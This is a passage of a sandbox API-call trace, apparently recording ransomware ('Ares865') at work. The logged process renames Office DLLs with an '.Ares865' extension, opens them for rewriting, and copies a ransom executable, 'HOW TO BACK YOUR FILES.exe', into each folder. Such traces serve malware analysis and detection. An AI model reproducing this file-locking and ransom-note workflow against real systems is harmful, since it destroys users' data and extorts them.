lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c46c00, ftCreationTime.dwHighDateTime=0x1cbdfac, ftLastAccessTime.dwLowDateTime=0xacfacf40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb1c46c00, ftLastWriteTime.dwHighDateTime=0x1cbdfac, nFileSizeHigh=0x0, nFileSizeLow=0x11e9780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSO.DLL", cAlternateFileName="")) returned 1 [0149.517] lstrcmpiW (lpString1="MSO.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0149.517] lstrcmpiW (lpString1="MSO.DLL", lpString2="aoldtz.exe") returned 1 [0149.517] lstrcpyW (in: lpString1=0x2cce47c, lpString2="MSO.DLL" | out: lpString1="MSO.DLL") returned="MSO.DLL" [0149.517] lstrlenW (lpString="MSO.DLL") returned 7 [0149.517] lstrlenW (lpString="Ares865") returned 7 [0149.517] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL.Ares865") returned 77 [0149.517] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll.ares865"), dwFlags=0x1) returned 1 [0149.529] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.529] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18782080) returned 1 [0149.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0149.886] lstrcpyW (in: lpString1=0x2cce47c, lpString2="MSORES.DLL" | out: lpString1="MSORES.DLL") returned="MSORES.DLL" [0149.886] lstrlenW (lpString="MSORES.DLL") returned 10 [0149.886] lstrlenW (lpString="Ares865") returned 7 [0149.886] lstrcmpiW (lpString1="RES.DLL", lpString2="Ares865") returned 1 [0149.887] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL.Ares865") returned 80 [0149.887] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll.ares865"), dwFlags=0x1) returned 1 [0149.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=72521600) returned 1 [0149.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.111] lstrcpyW (in: lpString1=0x2cce47c, lpString2="msoshext.dll" | out: lpString1="msoshext.dll") returned="msoshext.dll" [0150.111] lstrlenW (lpString="msoshext.dll") returned 12 [0150.111] lstrlenW (lpString="Ares865") returned 7 [0150.111] lstrcmpiW (lpString1="ext.dll", lpString2="Ares865") returned 1 [0150.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll.Ares865") returned 82 [0150.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll.ares865"), dwFlags=0x1) returned 1 [0150.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\msoshext.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoshext.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.114] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=988048) returned 1 [0150.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.166] lstrcpyW (in: lpString1=0x2cce47c, lpString2="MSOXMLMF.DLL" | out: lpString1="MSOXMLMF.DLL") returned="MSOXMLMF.DLL" [0150.166] lstrlenW (lpString="MSOXMLMF.DLL") returned 12 [0150.166] lstrlenW (lpString="Ares865") returned 7 [0150.166] lstrcmpiW (lpString1="LMF.DLL", lpString2="Ares865") returned 1 [0150.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL.Ares865") returned 82 [0150.166] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll.ares865"), dwFlags=0x1) returned 1 [0150.177] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSOXMLMF.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msoxmlmf.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.177] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49024) returned 1 [0150.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.183] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Office Setup Controller" | out: lpString1="Office Setup Controller") returned="Office Setup Controller" [0150.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0150.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xac) returned 0x2e8890 [0150.184] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0150.184] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96cba700, ftCreationTime.dwHighDateTime=0x1cac9ab, ftLastAccessTime.dwLowDateTime=0x30cd96d0, ftLastAccessTime.dwHighDateTime=0x1d2dda2, ftLastWriteTime.dwLowDateTime=0x96cba700, ftLastWriteTime.dwHighDateTime=0x1cac9ab, nFileSizeHigh=0x0, nFileSizeLow=0x4588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OPHPROXY.DLL", cAlternateFileName="")) returned 1 [0150.184] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0150.184] lstrcmpiW (lpString1="OPHPROXY.DLL", lpString2="aoldtz.exe") returned 1 [0150.184] lstrcpyW (in: lpString1=0x2cce47c, lpString2="OPHPROXY.DLL" | out: lpString1="OPHPROXY.DLL") returned="OPHPROXY.DLL" [0150.184] lstrlenW (lpString="OPHPROXY.DLL") returned 12 [0150.184] lstrlenW (lpString="Ares865") returned 7 [0150.184] lstrcmpiW (lpString1="OXY.DLL", lpString2="Ares865") returned 1 [0150.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL.Ares865") returned 82 [0150.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll.ares865"), dwFlags=0x1) returned 1 [0150.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.187] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17800) returned 1 [0150.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.192] lstrcpyW (in: lpString1=0x2cce47c, lpString2="RICHED20.DLL" | out: lpString1="RICHED20.DLL") returned="RICHED20.DLL" [0150.192] lstrlenW (lpString="RICHED20.DLL") returned 12 [0150.192] lstrlenW (lpString="Ares865") returned 7 [0150.192] lstrcmpiW (lpString1="D20.DLL", lpString2="Ares865") returned 1 [0150.192] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL.Ares865") returned 82 [0150.192] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll.ares865"), dwFlags=0x1) returned 1 [0150.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\RICHED20.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\riched20.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1366888) returned 1 [0150.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.265] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" [0150.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0150.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0150.265] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned 85 [0150.265] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller" [0150.265] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.265] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\office setup controller\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.267] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.267] GetLastError () returned 0x0 [0150.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.268] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.268] CloseHandle (hObject=0x120) returned 1 [0150.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.269] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.269] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7ae59d0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.269] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.269] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.269] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" [0150.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0150.269] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0150.269] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned 70 [0150.269] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures" [0150.269] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.269] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.270] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.271] GetLastError () returned 0x0 [0150.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.271] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.271] CloseHandle (hObject=0x120) returned 1 [0150.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.271] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.271] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad3651a0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x536faca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x536faca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.271] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.271] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.271] lstrcpyW (in: lpString1=0x2cce48e, lpString2="OFFICE.ODF" | out: lpString1="OFFICE.ODF") returned="OFFICE.ODF" [0150.271] lstrlenW (lpString="OFFICE.ODF") returned 10 [0150.271] lstrlenW (lpString="Ares865") returned 7 [0150.272] lstrcmpiW (lpString1="ICE.ODF", lpString2="Ares865") returned 1 [0150.272] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF.Ares865") returned 89 [0150.272] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf.ares865"), dwFlags=0x1) returned 1 [0150.274] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\Cultures\\OFFICE.ODF.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\cultures\\office.odf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.274] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4297568) returned 1 [0150.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.397] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" [0150.397] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0150.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0150.398] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned 66 [0150.398] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033" [0150.398] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.398] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.399] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.400] GetLastError () returned 0x0 [0150.400] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.400] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.400] CloseHandle (hObject=0x120) returned 1 [0150.400] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.400] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.400] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b36970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53720e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.400] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.400] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.401] lstrcpyW (in: lpString1=0x2cce486, lpString2="MSOINTL.DLL" | out: lpString1="MSOINTL.DLL") returned="MSOINTL.DLL" [0150.401] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0150.401] lstrlenW (lpString="Ares865") returned 7 [0150.401] lstrcmpiW (lpString1="NTL.DLL", lpString2="Ares865") returned 1 [0150.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.Ares865") returned 86 [0150.401] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.ares865"), dwFlags=0x1) returned 1 [0150.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.403] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2498944) returned 1 [0150.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.403] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.547] lstrcpyW (in: lpString1=0x2cce486, lpString2="MSOINTL.DLL.IDX_DLL" | out: lpString1="MSOINTL.DLL.IDX_DLL") returned="MSOINTL.DLL.IDX_DLL" [0150.547] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19 [0150.547] lstrlenW (lpString="Ares865") returned 7 [0150.547] lstrcmpiW (lpString1="IDX_DLL", lpString2="Ares865") returned 1 [0150.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.Ares865") returned 94 [0150.547] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.ares865"), dwFlags=0x1) returned 1 [0150.588] CreateFileW (lpFileName="C:\\Program Files 